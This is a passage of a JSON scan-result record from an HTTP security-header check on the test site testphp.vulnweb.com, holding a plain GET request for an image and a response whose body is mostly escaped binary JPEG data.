Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufffd8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\u